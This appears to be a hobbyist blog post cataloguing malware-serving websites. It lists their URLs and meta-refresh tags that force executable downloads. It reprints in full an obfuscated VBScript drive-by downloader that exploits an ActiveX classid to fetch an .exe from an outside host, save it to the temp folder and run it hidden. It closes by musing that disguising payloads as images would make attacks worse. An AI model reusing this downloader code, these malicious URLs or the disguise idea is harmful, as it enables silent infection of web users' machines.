Malware sites

I was pocking around the net, found some interesting malware sites:

Please don't try any of them unless you know what you are doing

http://jokeonlineworld.com/gift.html
< meta equiv="Refresh" content="0; URL=http://jokeonlineworld.com/gift.exe">


http://jokeonlineworld.com/
< meta equiv="Refresh" content="0; URL=http://jokeonlineworld.com/install.exe">


http://sequestro.t35.com/
"http://www.blogger.com/exigencias.exe" Leia atentamente todas as exigencias.

And another type which uses vbscript
http://www.youshini.com/jp/789.htm
on error resume next
Dim haotian
Set y = Nothing
ppp="obj"
ppp1="ect"
ppp2=ppp&ppp1
Set data = document.createElement(ppp2,"")
data.setAttribute ("classid"), ("clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")
bbs ="Micro"
bbs0 ="delm"
bbs1 ="soft.XMLHTTP"
bbs2 =bbs&bbs1
result = Null And Null
Set x = data.CreateObject(bbs2,"")
set mm = data.createobject("Adodb.Stream","")
mm.type = 1
mm.open
url = "http://www.453787.com/jp/photo1.exe"
ysha="GET"
x.Open ysha, url, False
x.Send
exe="haotian.bat"
bbp1 ="Scrip"
bbp2 ="ting.FileSystem"
bbp3 ="Object"
bbp =bbp1&bbp2&bbp3
mm.write x.responseBody
set F = data.createobject(bbp,"")
Set T = Nothing
set tmp = F.GetSpecialFolder(2)
exe= F.BuildPath(tmp,exe)
mm.savetofile exe,2
mm.close
set Bb = data.createobject("Shell.Application","")
Bb.ShellExecute exe,"","","open",0


Little more Googling led me to this
http://malware.hiperlinks.com.br/cgi/submit-agressive?action=list&type=agressive
which holds tons malware site, most of them are using the above two techniques, via embedding inside a script, flash or simply post the link.

Certainly most of these malwares are coded in different ways and have various features, such as keylogging, reverse connect, spwan a port, send credential over email or to irc etc. I don't feel surprise they use script to force victim to download their babies, but using < meta equiv="Refresh" content="0; URL=http://url"> is indeed pretty cool, coz it will be executed even you disable javascript in browser. I guess if it is possible to change exe to some other common mime type that a browser will download automatically, such as gif, swf etc will make the whole game more serious and horrible.

However, it is so funny to see how they work, and it is easy to steal what the attackers had collected due to most cracked stuff are stored in plain text.